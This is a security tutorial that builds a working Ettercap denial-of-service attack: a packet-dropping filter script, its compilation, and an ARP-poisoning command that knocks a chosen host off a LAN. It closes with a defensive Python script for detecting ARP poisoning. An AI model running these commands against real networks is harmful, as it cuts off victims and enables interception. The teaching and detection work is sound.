Using Ettercap we will perform a Denial of Service attack.
We will be using the security distribution BackTrack from http://www.remote-exploit.org because it comes preconfigured with most of the packages and tools we will be using. Any version of Linux will work for these tutorials; however, you will need to install and configure the packages yourself before attempting these scenarios.
Boot BackTrack and, when you are prompted, enter 'root' and the password 'toor', then set up your network connection.
If your network is configured with DHCP then issuing these commands from the terminal will usually suffice to set things up.
root@slax> 'ifconfig eth0 up'
root@slax> 'dhcpcd eth0'
Ettercap has many built-in tools to allow all sorts of network activity, from sniffing to ARP spoofing. It also has the ability to use filters to focus its activity. For example, suppose we want to block a host from the network. The simplest way to do that is to not allow any packets to be sent to or from the host we wish to block. Ettercap filters allow us to do just that.
At this point you should still be in the console in BackTrack. If you started the GUI, open a shell and type the following commands:
root@slax> 'cd /usr/local/share/ettercap'
Fire up a text editor and type in this block of text, replacing 'Target IP' with the IP address of the host you wish to keep from sending or receiving packets. Save it as dos.eft in the /usr/local/share/ettercap directory.
if (ip.src == 'Target IP' || ip.dst == 'Target IP') {
    drop();
    kill();
    msg("Packet Dropped\n");
}
From the command line, nano is a very easy-to-use text editor. Start it by typing:
root@slax> nano dos.eft
Type in the text and save it by pressing Ctrl+x and then press 'Enter' twice.
This scripting language is fairly straightforward. Our script checks whether the source IP OR destination IP matches our target. If it does, it drops the packet and sends a RST signal to the other machine our target was attempting to communicate with. It then outputs a message to our screen so we know a packet was dropped.
Now we have our file dos.eft saved in /usr/local/share/ettercap/ and are ready to compile it. Ettercap uses a program called etterfilter to compile filter scripts into files usable by the program. To run it and compile our script we simply type:
root@slax> 'etterfilter dos.eft -o dos.ef'
Our last example with Ettercap used the GTK interface. This time we will use the text-based interface.
root@slax> 'ettercap -T -q -F /usr/local/share/ettercap/dos.ef -M ARP /TARGET IP/ //'
The slashes are important. We have told Ettercap to run in Text Mode (-T), to run in quiet mode so that not every packet is printed to the screen (-q), to load a filter (-F filename), and to run a Man in the Middle attack (-M Attack Type). Finally, the slashes tell it which targets we want to select. We'll get into this in more detail later, but for now we're telling Ettercap to poison communications between our target and everything else on the LAN.
For our tests we set up one laptop with the IP address 192.168.1.209 as our victim, and another computer running ettercap with this command:
ettercap -T -q -F /usr/local/share/ettercap/dos.ef -M ARP /192.168.1.209/ //
You should see a screen similar to this:

Our target is now effectively off the network and you've learned the basics of writing ettercap filters. To learn more about filters, check the manpage for "etterfilter" and read the examples in the files at /usr/local/share/ettercap/etter.filter.examples.
Press 'q' to stop the Man in the Middle attack and exit the program.
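On the defending side, the ARP poisoning started by -M ARP shows up in the target's ARP cache: several LAN addresses suddenly resolve to one MAC address. The following is an added example, not part of the original tutorial, that parses Linux `arp -an` output and compares it with a known-good baseline; the sample tables, MAC addresses and function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Matches Linux `arp -an` lines; "<incomplete>" entries do not match and are skipped.
ARP_LINE = re.compile(
    r"\((\d{1,3}(?:\.\d{1,3}){3})\) at ([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})\b")

def parse_arp(text):
    """Return {ip: mac} from `arp -an` output, with MACs lower-cased."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def find_poisoning(baseline, current):
    """Return (changed, shared): IPs whose MAC moved, and MACs claimed by >1 IP."""
    changed = {ip: (baseline[ip], mac) for ip, mac in current.items()
               if ip in baseline and baseline[ip] != mac}
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    shared = {mac: sorted(ips, key=ipaddress.ip_address)
              for mac, ips in by_mac.items() if len(ips) > 1}
    return changed, shared

# Constructed sample data: the victim's ARP cache before and during poisoning.
BASELINE = """\
? (192.168.1.1) at 00:1a:2b:3c:4d:01 [ether] on eth0
? (192.168.1.50) at 00:1a:2b:3c:4d:50 [ether] on eth0
? (192.168.1.77) at <incomplete> on eth0
"""
POISONED = """\
? (192.168.1.1) at 00:1a:2b:3c:4d:99 [ether] on eth0
? (192.168.1.50) at 00:1a:2b:3c:4d:99 [ether] on eth0
? (192.168.1.120) at 00:1A:2B:3C:4D:99 [ether] on eth0
"""

if __name__ == "__main__":
    changed, shared = find_poisoning(parse_arp(BASELINE), parse_arp(POISONED))
    for ip, (old, new) in changed.items():
        print(f"MAC changed for {ip}: {old} -> {new}")
    for mac, ips in shared.items():
        print(f"{mac} is claimed by {len(ips)} addresses: {', '.join(ips)}")
```

A MAC shared by the gateway and other hosts is the signature to alert on, and the address in that group that was not in the baseline is usually the poisoning machine itself.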